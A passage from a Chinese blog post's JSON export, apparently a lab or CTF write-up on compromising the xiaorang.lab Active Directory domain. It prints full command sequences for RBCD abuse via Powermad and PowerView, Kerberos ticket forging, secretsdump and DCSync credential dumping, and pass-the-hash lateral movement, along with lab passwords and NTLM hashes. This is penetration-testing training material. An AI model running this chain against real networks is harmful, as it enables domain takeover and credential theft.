src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"482\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/14-3-1024x482.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2642\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>UserName: zhangxin\nPassword: admin4qwY38cc<\/code><\/pre>\n\n\n\n<p>\u63a5\u4e0b\u6765\u6253RBCD\uff0c\u53c2\u8003<a href=\"https:\/\/zhuanlan.zhihu.com\/p\/549838653?utm_id=0\">\u57df\u6e17\u900f\u4e4b\u59d4\u6d3e\u653b\u51fb\u5168\u96c6<\/a>\u91cc\u7684<strong>Acount 
Operators\u7ec4\u7528\u6237\u62ff\u4e0b\u4e3b\u673a<\/strong>\u3002\u8fd9\u91cc\u5229\u7528\u8fc7\u7a0b\u9664\u4e86\u6211\u4eec\u4e4b\u524d\u7528\u8fc7\u7684powerview.ps1\u591a\u4e86\u4e00\u4e2aPowermad.ps1(https:\/\/github.com\/Kevin-Robertson\/Powermad\/blob\/master\/Powermad.ps1)<\/p>\n\n\n\n<p>\u7136\u540e\u5bf9\u7740\u6211\u7684\u914d\u5c31\u884c\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/19-1-1024x573.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"573\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/19-1-1024x573.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2644\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>PS C:\\Users\\zhangxin\\Desktop&gt; Set-ExecutionPolicy Bypass -Scope Process\n\n\u6267\u884c\u7b56\u7565\u66f4\u6539\n\u6267\u884c\u7b56\u7565\u53ef\u5e2e\u52a9\u4f60\u9632\u6b62\u6267\u884c\u4e0d\u4fe1\u4efb\u7684\u811a\u672c\u3002\u66f4\u6539\u6267\u884c\u7b56\u7565\u53ef\u80fd\u4f1a\u4ea7\u751f\u5b89\u5168\u98ce\u9669\uff0c\u5982\nhttps:\/go.microsoft.com\/fwlink\/?LinkID=135170 \u4e2d\u7684 about_Execution_Policies \u5e2e\u52a9\u4e3b\u9898\u6240\u8ff0\u3002\u662f\u5426\u8981\u66f4\u6539\u6267\u884c\u7b56\u7565?\n&#91;Y] \u662f(Y)  &#91;A] \u5168\u662f(A)  &#91;N] \u5426(N)  &#91;L] \u5168\u5426(L)  &#91;S] \u6682\u505c(S)  &#91;?] 
\u5e2e\u52a9 (\u9ed8\u8ba4\u503c\u4e3a\u201cN\u201d): Y\nPS C:\\Users\\zhangxin\\Desktop&gt; import-module .\\Powermad.ps1\nPS C:\\Users\\zhangxin\\Desktop&gt; New-MachineAccount -MachineAccount test -Password $(ConvertTo-SecureString \"123456\" -AsPlainText -Force)\n&#91;+] Machine account test added\nPS C:\\Users\\zhangxin\\Desktop&gt; import-module .\\powerview.ps1\nPS C:\\Users\\zhangxin\\Desktop&gt; Get-NetComputer test -Properties objectsid\n\nobjectsid\n---------\nS-1-5-21-3535393121-624993632-895678587-1117\n\n\nPS C:\\Users\\zhangxin\\Desktop&gt; $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList \"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1117)\"\nPS C:\\Users\\zhangxin\\Desktop&gt; $SDBytes = New-Object byte&#91;] ($SD.BinaryLength)\nPS C:\\Users\\zhangxin\\Desktop&gt; $SD.GetBinaryForm($SDBytes, 0)\nPS C:\\Users\\zhangxin\\Desktop&gt; Get-DomainComputer Fileserver| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose\n\u8be6\u7ec6\u4fe1\u606f: &#91;Get-DomainSearcher] search string: LDAP:\/\/DC.xiaorang.lab\/DC=xiaorang,DC=lab\n\u8be6\u7ec6\u4fe1\u606f: &#91;Get-DomainObject] Get-DomainObject filter string:\n(&amp;(|(distinguishedname=CN=FILESERVER,CN=Computers,DC=xiaorang,DC=lab)))\n\u8be6\u7ec6\u4fe1\u606f: &#91;Set-DomainObject] Setting 'msds-allowedtoactonbehalfofotheridentity' to '1 0 4 128 20 0 0 0 0 0 0 0 0 0 0\n 0 36 0 0 0 1 2 0 0 0 0 0 5 32 0 0 0 32 2 0 0 2 0 44 0 1 0 0 0 0 0 36 0 255 1 15 0 1 5 0 0 0 0 0 5 21 0 0 0 97 209\n185 210 96 165 64 37 123 248 98 53 93 4 0 0' for object 'FILESERVER$'\nPS C:\\Users\\zhangxin\\Desktop&gt;<\/code><\/pre>\n\n\n\n<p>\u914d\u5b8c\u4e86\u8bb0\u5f97\u6539\u672c\u5730\u7684\/etc\/hosts\uff0c\u4e0d\u7136\u8fde\u4e0d\u4e0a\u53bb<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/20.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"614\" height=\"240\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/20.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2645\"  sizes=\"auto, (max-width: 614px) 100vw, 614px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u4e0b\u6765\u8001\u5957\u8def\u7533\u8bf7\u7968\u636e\u5c31\u884c\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 getST.py -dc-ip 172.22.60.8 xiaorang.lab\/test\\$:123456 -spn cifs\/Fileserver.xiaorang.lab -impersonate administrator\nexport KRB5CCNAME=administrator.ccache\nproxychains python3 psexec.py Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8 -codec gbk<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/21.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"604\" height=\"208\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/21.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2646\"  sizes=\"auto, (max-width: 604px) 100vw, 604px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u4e00\u5957\u6d41\u7a0b\u540c\u6837\u80fd\u6253PC1\u4e0a\u7684flag2\u7684\uff0c\u56e0\u4e3a\u6211\u4eec\u7528\u6237\u7ec4\u80fd\u6539\u975e\u57df\u63a7\u7684\u6240\u6709\u673a\u5668\uff0c\u4f46\u8fd9\u6837\u6bd4\u8f83\u8822\uff0c\u6bd5\u7adf\u6253\u5b8cFILESERVER\u4e0b\u4e00\u6b65\u90fd\u80fd\u62ff\u57df\u63a7\u4e86\uff0c\u540e\u9762\u6a2a\u4f20flag2\u5c31\u884c\u4e86<\/p>\n\n\n\n<p>\u5148\u6293\u4e00\u4e0bFILESERVER\u7684\u54c8\u5e0c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 secretsdump.py -k -no-pass Fileserver.xiaorang.lab -dc-ip 172.22.60.8<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/22.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"668\" height=\"345\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/22.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2647\"  sizes=\"auto, (max-width: 668px) 100vw, 668px\" \/><\/div><\/figure>\n\n\n\n<pre 
class=\"wp-block-code\"><code>XIAORANG\\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::<\/code><\/pre>\n\n\n\n<p>\u54c8\u5e0c\u662f951d8a9265dfb652f42e5c8c497d70dc\uff0c\u63a5\u4e0b\u6765\u7528Fileserver\u673a\u5668\u8d26\u6237\u8fdb\u884cDCSync<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains secretsdump.py xiaorang.lab\/'Fileserver$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3cfdc08527ec4ab6aa3e630e79d349b:::\n&#91;*] Kerberos keys grabbed\nAdministrator:aes256-cts-hmac-sha1-96:4502e83276d2275a8f22a0be848aee62471ba26d29e0a01e2e09ddda4ceea683\nAdministrator:aes128-cts-hmac-sha1-96:38496df9a109710192750f2fbdbe45b9\nAdministrator:des-cbc-md5:f72a9889a18cc408<\/code><\/pre>\n\n\n\n<p>c3cfdc08527ec4ab6aa3e630e79d349b\u5c31\u662f\u57df\u63a7\u54c8\u5e0c\u4e86\uff0c\u540e\u9762\u6a2a\u4f20\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b Administrator@172.22.60.8 -codec gbk<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/23.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"710\" height=\"428\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/23.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" 
class=\"wp-image-2648\"  sizes=\"auto, (max-width: 710px) 100vw, 710px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab\/Administrator@172.22.60.15 -codec gbk<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/16-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"528\" height=\"188\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/16-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2649\"  sizes=\"auto, (max-width: 528px) 100vw, 528px\" \/><\/div><\/figure>\n\n\n\n<p>\u6253\u5b8c\u4e00\u6b21\u548c\u865a\u8131\u4e86\u4e00\u6837\uff0c\u5509<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u8003\u70b9:<br \/>\nFlarum\u540e\u53f0RCE<br \/>\ncapabilities\u63d0\u6743\u2014\u2014openssl\u547d\u4ee4<br \/>\nAS-REP Roasting<br \/>\n\u6293xshell\u5bc6\u7801<br \/>\nAccount Operators\u7ec4\u7528\u6237\u6253RBCD<br 
\/>\nDCSync<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-2626","post","type-post","status-publish","format-standard","hentry","category-11"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2626","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=2626"}],"version-history":[{"count":7,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2626\/revisions"}],"predecessor-version":[{"id":2658,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2626\/revisions\/2658"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=2626"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=2626"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=2626"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}